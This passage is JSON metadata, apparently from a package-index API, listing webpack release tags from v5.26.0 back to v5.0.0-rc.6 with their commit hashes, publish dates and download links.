sts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/t